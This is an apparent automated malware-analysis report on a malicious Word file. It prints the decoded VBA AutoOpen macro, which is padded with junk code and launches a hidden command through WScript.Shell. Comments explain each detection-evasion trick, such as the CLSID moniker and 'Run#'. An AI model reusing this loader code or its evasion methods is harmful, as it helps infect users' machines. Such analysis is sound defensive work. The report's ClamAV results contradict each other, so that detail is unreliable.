Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1059.003 Windows Command Shell
The sample contains a VBA macro with an AutoOpen function that leverages the dangerous WScript.Shell COM object. This macro is designed to execute obfuscated commands via cmd.exe, which in turn appears to invoke PowerShell to download and execute a second-stage payload from a series of concatenated URLs. The obfuscated command string is a key indicator of malicious intent.
Heuristics (10)

- ClamAV: Doc.Malware.Powload-6827912-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Powload-6827912-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID [critical] OLE_VBA_GETOBJECT_CLSID_DANGEROUS: VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched lines in script:
  Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW)
  On Error Resume Next
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
  Matched lines in script:
  Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW)
  On Error Resume Next
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro
  Matched lines in script:
  Attribute VB_Customizable = True
  Sub AutoOpen()
  On Error Resume Next
- Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD: Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell [high] SC_STR_POWERSHELL: Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6016 bytes |

SHA-256: 0ed6b60cad437bf6943637c3a8daafd40264f30952169cf6a3a945ba617d67f3

Detection
ClamAV: No threats found
Obfuscation or payload: likely (86 of 141 identifiers look randomly generated, e.g. 'jkjQbdJDi', consistent with name-mangling obfuscation)
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "TMrkPlA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
' The Select Case blocks throughout this macro are junk code: each selector
' is an undeclared (Empty) variable, so no Case branch is ever taken.
Select Case nKCHWu
Case 314225553
REIvv = Hex(zUhjZC)
zLERQX = Cos(223964602)
TRaUEzfE = 121763573
Case 261518072
NWLPpZiXX = Hex(DqCRzowwq)
XNSzm = Sqr(223708615 / CSng(181299475 - Cos(281463566 - 125198893) + POvdow + Rnd(258247617 - 319174944)))
rizKjP = Hex(YCFJhGc)
End Select
On Error Resume Next
Select Case zwoNG
Case 175550103
OjidKi = Hex(ajmBhFp)
uTjzrzwnw = Cos(34375498)
wLztpw = 271314414
Case 2477364
MFwnwdf = Hex(ninjPCD)
dGjNSsf = Sqr(157609371 / CSng(284911953 - Cos(210719433 - 79748993) + pzCsFLi + Rnd(270457525 - 148455809)))
BOTSAQRji = Hex(vYLrG)
End Select
On Error Resume Next
Select Case jzZDIfY
Case 195887290
AwWjQ = Hex(ZGvVbBjTo)
biaFh = Cos(193137214)
iGfKwiAFk = 58605975
Case 33648512
rWsDK = Hex(kziYZz)
ltjzzYbX = Sqr(325855887 / CSng(258592911 - Cos(169270936 - 245164906) + aXuQqtbP + Rnd(320535881 - 260502099)))
iPlwiQKh = Hex(iNpTHnkd)
End Select
On Error Resume Next
Select Case PiKkVEipj
Case 169513881
mltLbKS = Hex(VOXWEUIM)
EzAhX = Cos(157456631)
VifkDSN = 341237409
Case 288827828
ZBYpn = Hex(fLMir)
FPNsb = Sqr(240342036 / CSng(216209631 - Cos(164769068 - 325076552) + NOptfh + Rnd(238957300 - 18318955)))
XiwvH = Hex(NQvUVKpm)
End Select
' Fetches a named shape from the document; its text carries the command string
Set PXLqdSS = Shapes("wwUiYjcaM")
On Error Resume Next
Select Case jVuRGc
Case 62975910
OhFPhXiJ = Hex(CzLPSSjn)
AzPhiER = Cos(62599017)
vVsSjNXwH = 206288411
Case 19593862
qrMhqCuDQ = Hex(LdfcL)
jwBwYi = Sqr(230745325 / CSng(259993889 - Cos(315343634 - 240069568) + wrVKEk + Rnd(208270630 - 62137329)))
DArBW = Hex(csKOn)
End Select
' Assembles the command to run from the shape's text; the surrounding
' variables are never assigned and contribute nothing
bJiwwc = "" + PJdEX + ZlGow + PXLqdSS.TextFrame.TextRange.Text + sHtzSFOj + bSCqdhzG
On Error Resume Next
Select Case SIPDRL
Case 3167370
crkhNzpf = Hex(YosbO)
NAojTi = Cos(67262469)
uqauE = 185140920
Case 247657338
DrdOSll = Hex(ANzSlK)
nEvCD = Sqr(187028664 / CSng(187816416 - Cos(218873350 - 15570860) + mprnEl + Rnd(25299906 - 104988147)))
lAzzu = Hex(OXjFkrT)
End Select
On Error Resume Next
Select Case ncqplKbzk
Case 47971642
uohiJWNpl = Hex(jzPUYPQ)
ClvTLF = Cos(335759634)
khvhCdW = 212062023
Case 259993361
cINfBqj = Hex(HdaUMu)
fiVCac = Sqr(188008983 / CSng(233023080 - Cos(222599312 - 251266400) + tDbCdjhB + Rnd(257995448 - 53173411)))
WkFjv = Hex(VAPUAVWvA)
End Select
On Error Resume Next
Select Case OYuCKE
Case 179509213
dfDrP = Hex(wKOZwJ)
PXsNbsaIA = Cos(112736752)
FSkEZV = 227034674
Case 233707858
pzMvubAt = Hex(vPDiOzBCp)
MAucOomz = Sqr(182348749 / CSng(289622094 - Cos(242573929 - 294252594) + MXKPLzSAs + Rnd(215963956 - 75948399)))
BKWDk = Hex(XfzXk)
End Select
On Error Resume Next
Select Case YVqZM
Case 64247105
AtWwwC = Hex(mjhJc)
aTrIWGwT = Cos(270714333)
Qhrch = 266697035
Case 176200267
szQzhSs = Hex(LoibCJsG)
EiiDFNw = Sqr(72590518 / CSng(246730006 - Cos(43646092 - 117618199) + ZVwFL + Rnd(110925152 - 192901146)))
amYQmv = Hex(kNFHo)
End Select
' "new:{CLSID}" moniker instantiates WScript.Shell by its raw CLSID rather than
' CreateObject("WScript.Shell"), sidestepping ProgID-based detection
Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW)
On Error Resume Next
Select Case LVKwXLD
Case 328464014
zYlSCUUD = Hex(XoobltXt)
zPJXN = Cos(170814519)
wSYZFCFFW = 314369590
Case 316532397
JGYwrzr = Hex(jkjQbdJDi)
ZLLTGBv = Sqr(200172338 / CSng(200427274 - Cos(136924903 - 232792512) + EpzzjvaR + Rnd(120748192 - 157310558)))
iSLiHwb = Hex(BXwVkMqAX)
End Select
' Window style 0 (hidden), passed as the second argument to Run below
Const RkXlasdp = 0
On Error Resume Next
Select Case njENW
Case 311023780
qVqRGRWMO = Hex(jcuEOXCL)
RwYcka = Cos(66799475)
vfOaTTFI = 216999679
Case 61465550
UVGrIzkOV = Hex(ZJCCCdzRs)
qwiaj = Sqr(151900 / CSng(94634990 - Cos(89436676 - 60511179) + vhNFqwKG + Rnd(107251246 - 206791666)))
LolWW = Hex(YQpFro)
End Select
On Error Resume Next
Select Case zaZEpYOS
Case 223804275
jtfWj = Hex(XiWCYjfia)
ZicjQu = Cos(41803654)
iuXTbl = 106620847
Case 219313503
WqsmVSpw = Hex(oCOOv)
dczfpBppm = Sqr(96221498 / CSng(261634855 - Cos(266057239 - 122579271) + Clmrz + Rnd(56286925 - 263473732)))
aEQnjOFD = Hex(Uzcpz)
End Select
On Error Resume Next
Select Case oUukq
Case 35752782
PjSva = Hex(XaGoBTZB)
zsCiO = Cos(202743273)
JWzKFUzSC = 12630467
Case 274492885
zYkCAjINi = Hex(fLwFlUCh)
qZQXvz = Sqr(105082529 / CSng(214283243 - Cos(23509120 - 179741470) + mzdZCdPp + Rnd(15470181 - 309503076)))
RPbqm = Hex(AiiQUp)
End Select
' WScript.Shell.Run with the assembled command in a hidden window; VBA tolerates
' the trailing # type-declaration character, which defeats naive matching on ".Run"
sTriKPpEu.Run# bJiwwc, RkXlasdp
On Error Resume Next
Select Case aPMLWNp
Case 182459235
bQpbAUtZm = Hex(wzlzutpwt)
bYzOaj = Cos(158523348)
lzWOQLY = 3831224
Case 143716721
wnDEU = Hex(kipSRS)
QwLWCRaA = Sqr(108130003 / CSng(318683607 - Cos(103459751 - 263237476) + ajiZYuXl + Rnd(4674533 - 39131188)))
XEoivu = Hex(LTPGS)
End Select
End Sub